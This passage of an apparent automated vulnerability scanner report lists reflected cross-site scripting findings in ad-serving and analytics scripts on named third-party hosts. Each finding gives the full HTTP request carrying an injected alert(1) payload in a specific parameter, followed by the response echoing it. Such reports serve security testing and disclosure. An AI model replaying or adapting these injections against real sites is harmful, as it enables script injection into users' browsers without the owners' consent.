Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:29 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32481

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var expandUnitType = '1eabbc';alert(1)//3d9d7ab3ac4';
    this.playBtnOrientation = 'right';
    var playBtnContainerInitHeight = 90;
    var playBtnContainerInitWidth = 0;
    this.playBtnContainerHeight = 90;
    this.playBtnContainerWidth = 120;
        this.co
...[SNIP]...

4.95. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The value of the expandUnitType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f430e"%3balert(1)//86c1c56c0d3 was submitted in the expandUnitType parameter. This input was echoed as f430e";alert(1)//86c1c56c0d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1f430e"%3balert(1)//86c1c56c0d3&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:29 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32481

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
oPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&jvxSessionId=1307962949.7885&expandedUnit=1&viewLayout=1f430e";alert(1)//86c1c56c0d3&adUnitWidth=&adUnitHeight=";

return slideOutLargeUnit(playerObject.playerExInteractivityDomReference.id, interactivityUrl, "expandedUnit");
}

    function setLargeAdUn
...[SNIP]...

4.96. http://as.jivox.com/unit/jivox_unit_tags.php [mouseAction parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The value of the mouseAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce2f"%3balert(1)//55b8c35db09 was submitted in the mouseAction parameter. This input was echoed as fce2f";alert(1)//55b8c35db09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOverfce2f"%3balert(1)//55b8c35db09 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:37 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32438

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
bject.playerExCloseInteractivityBtnDomReference, "click", function(){playerObject.slideInLargeAdUnit();}, false);
           }

               attachEventListener(playerObject.playBtnContainerDomReference, "mouseoverfce2f";alert(1)//55b8c35db09", function(e){playerObject.slideOutLargeAdUnit('19628','24bbcd13d37379');}, false);


               attachEventListener(playerObject.playerExInteractivityDomReference, "mouseover", function(e){playerObjec
...[SNIP]...

4.97. http://as.jivox.com/unit/jivox_unit_tags.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fcf3"%3balert(1)//d36d2acaf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fcf3";alert(1)//d36d2acaf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver&9fcf3"%3balert(1)//d36d2acaf3=1 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:37 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32395

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
var creativeUnitType = '1';
var
...[SNIP]...
EzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.nealtire.com%2F&mouseAction=mouseOver&9fcf3";alert(1)//d36d2acaf3=1&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&jvxSessionId=1307962957.6909&expandedUnit=1&viewLa
...[SNIP]...

4.98. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 724da"%3balert(1)//2a404fbdcee was submitted in the objectName parameter. This input was echoed as 724da";alert(1)//2a404fbdcee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894724da"%3balert(1)//2a404fbdcee&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:27 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 33059

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
return document.getElementById(movieName);
}
};

}

if(typeof(jivoxUnit) != "undefined"){
var jvxAdPlayer_894724da";alert(1)//2a404fbdcee = new jivoxUnit();
var jvxAdPlayer_894724da";alert(1)//2a404fbdceeflashVersion = jvxAdPlayer_894724da";alert(1)//2a404fbdcee.getFlashVersion();
var jvxAdPlayer_894724da";alert(1)//2a404fbdceeversions = jvxAdPlayer_894724da";alert(1)//2a404fbdceeflashVersion.split(','
...[SNIP]...

4.99. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 11a92%3balert(1)//27abb62e794 was submitted in the objectName parameter. This input was echoed as 11a92;alert(1)//27abb62e794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_89411a92%3balert(1)//27abb62e794&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:27 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 33030

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
avigator.appName.indexOf("Microsoft Internet")!=-1)
{
return document.getElementById(movieName);
}
};

}

if(typeof(jivoxUnit) != "undefined"){
var jvxAdPlayer_89411a92;alert(1)//27abb62e794 = new jivoxUnit();
var jvxAdPlayer_89411a92;alert(1)//27abb62e794flashVersion = jvxAdPlayer_89411a92;alert(1)//27abb62e794.getFlashVersion();
var jvxAdPlayer_89411a92;alert(1)//27abb62e794versions = j
...[SNIP]...

4.100. http://as.jivox.com/unit/jivox_unit_tags.php [siteId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The value of the siteId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7db45'%3balert(1)//cc2b6fb18db was submitted in the siteId parameter. This input was echoed as 7db45';alert(1)//cc2b6fb18db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d373797db45'%3balert(1)//cc2b6fb18db&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:30 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32263

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
var creativeUnitType = '1';
var
...[SNIP]...
<a href="http://as.jivox.com/player/proxy.php?campaignId=19628&siteId=24bbcd13d373797db45';alert(1)//cc2b6fb18db&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxha
...[SNIP]...

4.101. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f78f6<script>alert(1)</script>46dbba33e76 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7f78f6<script>alert(1)</script>46dbba33e76&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:22 GMT
Date: Mon, 13 Jun 2011 11:01:22 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7f78f6<script>alert(1)</script>46dbba33e76", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.102. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 9a43a<script>alert(1)</script>89e036b59b8 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=9a43a<script>alert(1)</script>89e036b59b8&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:33 GMT
Date: Mon, 13 Jun 2011 11:01:33 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"9a43a<script>alert(1)</script>89e036b59b8", c16:"", r:""});

4.103. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 74de2<script>alert(1)</script>f5c8345fe6a was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=596488874de2<script>alert(1)</script>f5c8345fe6a&c3=2&c4=&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:24 GMT
Date: Mon, 13 Jun 2011 11:01:24 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"596488874de2<script>alert(1)</script>f5c8345fe6a", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.104. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload eae72<script>alert(1)</script>592488c2035 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2eae72<script>alert(1)</script>592488c2035&c4=&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:24 GMT
Date: Mon, 13 Jun 2011 11:01:24 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2eae72<script>alert(1)</script>592488c2035", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.105. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 390ca<script>alert(1)</script>b602141498d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=390ca<script>alert(1)</script>b602141498d&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:31 GMT
Date: Mon, 13 Jun 2011 11:01:31 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"390ca<script>alert(1)</script>b602141498d", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.106. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1963a<script>alert(1)</script>ee868e885cc was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=1963a<script>alert(1)</script>ee868e885cc&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:33 GMT
Date: Mon, 13 Jun 2011 11:01:33 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"1963a<script>alert(1)</script>ee868e885cc", c6:"", c10:"", c15:"", c16:"", r:""});

4.107. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9a60f<script>alert(1)</script>a2e90c8fffe was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=9a60f<script>alert(1)</script>a2e90c8fffe&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
